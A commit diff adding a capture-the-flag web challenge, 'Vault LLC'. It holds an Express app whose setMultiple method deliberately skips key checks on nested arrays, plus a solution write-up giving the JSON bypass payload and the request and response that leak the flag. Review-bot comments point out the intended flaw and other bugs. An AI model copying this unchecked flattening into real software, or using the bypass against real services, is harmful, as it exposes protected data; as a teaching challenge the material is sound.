Vault LLC
kabachook authored Jun 7, 2019
1 parent fc5e6cb commit ed0b49c
Showing 469 changed files with 72,761 additions and 0 deletions.
1 change: 1 addition & 0 deletions vault_llc/.dockerignore
@@ -0,0 +1 @@
node_modules
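Review bot: Only `node_modules` is excluded here, so the Dockerfile's `COPY . .` also copies SOLUTION.md, README.md, .env and docker-compose.yml into the challenge image; add those entries so the writeup and the compose file with the flag are not shipped to the container. The same commit also checks in vault_llc/node_modules (node_modules/.bin/mime, node_modules/.yarn-integrity), which accounts for most of the 469 changed files; the Dockerfile already runs `yarn`, so a .gitignore entry for node_modules would keep the dependency tree out of the repository.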
1 change: 1 addition & 0 deletions vault_llc/.env
@@ -0,0 +1 @@
COMPOSE_PROJECT_NAME=vault
14 changes: 14 additions & 0 deletions vault_llc/Dockerfile
@@ -0,0 +1,14 @@
FROM node:alpine

WORKDIR /usr/src/app

COPY package.json yarn.lock ./

RUN yarn

COPY . .

ENV flag "battles{never_parse_user_input_structures!!!}"

EXPOSE 31337
CMD ["yarn", "start"]
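Review bot: The `ENV flag "battles{...}"` line stores the flag in the image itself, where anyone who can pull or inspect the battles/vault image reads it without touching the service; drop it from the Dockerfile and supply the value only at run time, which docker-compose.yml already does through `environment:`. Two smaller points on the same file: `FROM node:alpine` is unpinned, so rebuilds can pick up a different Node version, and there is no `USER` instruction, so `yarn start` runs as root inside the container; pinning a tag and adding `USER node` would address both.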
11 changes: 11 additions & 0 deletions vault_llc/README.md
@@ -0,0 +1,11 @@
# Vault LLC

## Автор
Данил Бельтюков ([kabachook](https://github.com/kabachook))

## Задание
```
<URL>
```

## [Решение](SOLUTION.md)
34 changes: 34 additions & 0 deletions vault_llc/SOLUTION.md
@@ -0,0 +1,34 @@
Флаг лежит в `storage._vault['flag']`,
через `storage.get('flag')` его нельзя достать т.к нельзя прописать себе `level`

Это можно обойти, юзнув `setMultiple` с аргументами `['blabla', ['blabla', 'level', 'spbctf_security_1337']]`

`setMultiple` "раскроет вложенные массивы", которые обойдут проверку ключа

Вложенный массив можно передать, потому что используется body-parser

> GET /setm HTTP/1.1
> Host: localhost:31337
> User-Agent: insomnia/6.4.2
> Content-Type: application/json
> Accept: */*
> Content-Length: 52

| [
| "kek", ["lul", "level", "spbctf_security_1337"]
| ]

----

> GET /get?key=flag HTTP/1.1
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Content-Type: application/json; charset=utf-8
< Content-Length: 45
< ETag: W/"2d-T0uhy/9+2Ry6rEl3D5TELS5q8OQ"
< Date: Thu, 09 May 2019 12:58:42 GMT
< Connection: keep-alive

| {
| "value": "battles{never_parse_user_input_structures!!!}"
| }
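Review bot: The writeup leaves out that the two requests have to share a session cookie: index.js keeps one `Storage` per `req.sessionID`, so the `/get?key=flag` call only returns the flag if it is sent in the same session as the `/setm` call, and neither request dump shows a `Cookie` header. It would also help to say that the JSON body is sent on a GET request, since not every client does that, and to use the same sample values in the text (`'blabla'`) and in the captured request (`"kek"`, `"lul"`).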
10 changes: 10 additions & 0 deletions vault_llc/docker-compose.yml
@@ -0,0 +1,10 @@
version: "3"

services:
vault:
build: .
image: battles/vault
ports:
- 15101:31337
environment:
- flag=battles{never_parse_user_input_structures!!!}
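Review bot: The `flag=battles{...}` entry under `environment:` commits the real flag to the repository in a second place besides the Dockerfile; keep one source of truth, for example `flag=${FLAG}` resolved from an untracked env file on the host, so rotating the flag does not require a commit. The committed vault_llc/.env only sets `COMPOSE_PROJECT_NAME`, so the flag would need its own untracked file rather than being added there.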
14 changes: 14 additions & 0 deletions vault_llc/index.html
@@ -0,0 +1,14 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<title>Vault LLC</title>
</head>
<body>
<h2>Can you break into my vault?</h2>
<h3>Source at <a href="/index.js">/index.js</a></h3>
<!-- <h4>Thx GreenDog for vector</h4> -->
</body>
</html>
122 changes: 122 additions & 0 deletions vault_llc/index.js
@@ -0,0 +1,122 @@
const express = require("express");
const bodyParser = require("body-parser");
const session = require("express-session");

class Storage {
constructor() {
this._vault = {};
}

get(key) {
console.log("get ", key);
if (key === "flag" && this._vault["level"] != "spbctf_security_1337") {
return "nope";
}
return this._vault[key];
}

set(key, value) {
console.log("set ", key, value);
if (key === "level" || key === "flag") {
return "nope";
}
return (this._vault[key] = value);
}

setMultiple(...args) {
console.log("setm ", args);
let key = null,
value = null;
let queue = [];

for (let curr of args) {
if (typeof curr === "object") {
queue.push(...curr);
} else {
if (curr === "level" || curr === "flag") {
return "nope";
}

queue.push(curr);
}
}

if (queue.length % 2 !== 0) return;

for (let i = 0; i < queue.length; i += 2) {
key = queue[i];
value = queue[i + 1];

if (key === "flag") {
return "nope";
}

this._vault[key] = value;
}

return queue;
}
}

const startServer = async port => {
const app = express();
app.use(bodyParser.json({ extended: true }));
app.use(
session({ secret: "battles", resave: false, saveUninitialized: true })
);

let storages = {};

app.use((req, res, next) => {
if (!storages[req.sessionID]) {
storages[req.sessionID] = new Storage();
storages[req.sessionID]._vault["flag"] = process.env["flag"] || "FLAG";
storages[req.sessionID]._vault["level"] = "0";
}

req.storage = storages[req.sessionID];
return next();
});

app.get("/", (req, res) => {
res.sendFile(__dirname + "/index.html");
});

app.get("/index.js", (req, res) => {
res.sendFile(__dirname + "/index.js");
});

app.get("/set", (req, res) => {
const { key, value } = req.query;

if (!key || !value) {
return res.status(400).json({ error: "Not all params" });
}

res.json({
value: req.storage.set(key, value)
});
});

app.get("/setm", (req, res) => {
res.json({
value: req.storage.setMultiple(...req.body)
});
});

app.get("/get", (req, res) => {
const { key } = req.query;

if (!key) {
return res.status(400).json({ error: "Not all params" });
}

res.json({
value: req.storage.get(key)
});
});

app.listen(port, () => console.log(`Started at :${port}`));
};

startServer(31337);
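Review bot: In `setMultiple`, the `typeof curr === "object"` branch does `queue.push(...curr)` without the `"level"`/`"flag"` check that the scalar branch applies, and the write loop afterwards rejects only `key === "flag"`, so a `"level"` key inside a nested array is written to `this._vault`. SOLUTION.md shows this is the intended challenge path, so a short comment marking it as deliberate would stop someone from "fixing" it later; in non-challenge code the key check belongs in the write loop, after flattening. Unintended problems in the same hunk: `setMultiple(...req.body)` in the `/setm` handler throws a TypeError when the body is missing or is a JSON object rather than an array, and `typeof null === "object"` makes `queue.push(...curr)` throw for a `null` element, so add an `Array.isArray` guard and return 400. `bodyParser.json({ extended: true })` passes an option that belongs to `bodyParser.urlencoded` and has no effect on the JSON parser. Finally, `storages` gains a new `Storage` for every request without a session cookie (`saveUninitialized: true`) and is never pruned, so memory grows without bound on a public instance, and the session secret `"battles"` is readable by anyone through the `/index.js` route.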
8 changes: 8 additions & 0 deletions vault_llc/node_modules/.bin/mime


84 changes: 84 additions & 0 deletions vault_llc/node_modules/.yarn-integrity

